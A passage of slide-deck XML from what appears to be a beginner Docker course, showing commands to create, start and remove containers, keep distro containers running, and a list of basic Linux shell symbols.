            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       rmi = Remove Image</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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2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990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3534">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create Container from image</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1422" name="Google Shape;1422;p228"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8740500" cy="3354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750">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container create --name &lt;containerName&gt; &lt;imageId/imageName:tagName&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	or</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker create </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name &lt;containerName&gt; &lt;baseimage&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container create --name nginx_base -p 80:80 nginx:alpine</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker create --name nginx_base -p 80:80 nginx:alpine</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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22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990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3534">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Delete a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3534">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1428" name="Google Shape;1428;p229"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8740500" cy="3354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2750">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2750">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container rm &lt;containerId/ContainerName&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Or</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker rm &lt;containerId/ContainerName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2750">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3534">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start the Container</a:t>
            </a:r>
            <a:endParaRPr sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434" name="Google Shape;1434;p230"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957675" y="1591250"/>
            <a:ext cx="7954800" cy="2777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2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2650">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker container start &lt;contName/contId&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker start &lt;contName/contId&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410175" y="1225125"/>
            <a:ext cx="8520600" cy="11919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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3534">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to make ubuntu container always up and running ?</a:t>
            </a:r>
            <a:endParaRPr sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1440" name="Google Shape;1440;p231"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333675" y="2616750"/>
            <a:ext cx="8673600" cy="8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rgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -u root --privileged  -it -d ubuntu:latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410175" y="1225125"/>
            <a:ext cx="8520600" cy="11919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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3534">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to make alpine container always up and running ?</a:t>
            </a:r>
            <a:endParaRPr sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1446" name="Google Shape;1446;p232"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333675" y="2616750"/>
            <a:ext cx="8673600" cy="8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rgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -u root --privileged  -it -d alpine:latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410175" y="1225125"/>
            <a:ext cx="8520600" cy="11919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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3534">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to make debian container always up and running ?</a:t>
            </a:r>
            <a:endParaRPr sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1452" name="Google Shape;1452;p233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333675" y="2616750"/>
            <a:ext cx="8673600" cy="8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rgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -u root --privileged  -it -d debian:latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="211100"/>
            <a:ext cx="8520600" cy="70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3559">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux Symbols</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="976075"/>
            <a:ext cx="8520600" cy="3714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3600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.   =  Current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directory</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..  =  Parent directory</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~  =  Home directory</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$  =  Logged in as regular user</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#  =  Logged in as root</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410175" y="1225125"/>
            <a:ext cx="8520600" cy="11919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990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3534">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to make centos container always up and running ?</a:t>
            </a:r>
            <a:endParaRPr sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1458" name="Google Shape;1458;p234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333675" y="2616750"/>
            <a:ext cx="8673600" cy="8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rgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -u root --privileged  -it -d centos:latest</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="185850"/>
            <a:ext cx="8520600" cy="19101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990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assignments</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3700">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Break down the below command into individual steps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4620">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1464" name="Google Shape;1464;p235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454200" y="2297225"/>
            <a:ext cx="8235600" cy="180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1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3700">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -it ubuntu:latest /bin/bash</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2650">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="1191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3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker run is a combination of 3 commands</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3534">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1470" name="Google Shape;1470;p236"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1979500"/>
            <a:ext cx="8414100" cy="1857000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker image pull</a:t>
            </a:r>
            <a:endParaRPr sz="3500">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-450850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buAutoNum type="arabicPeriod"/>
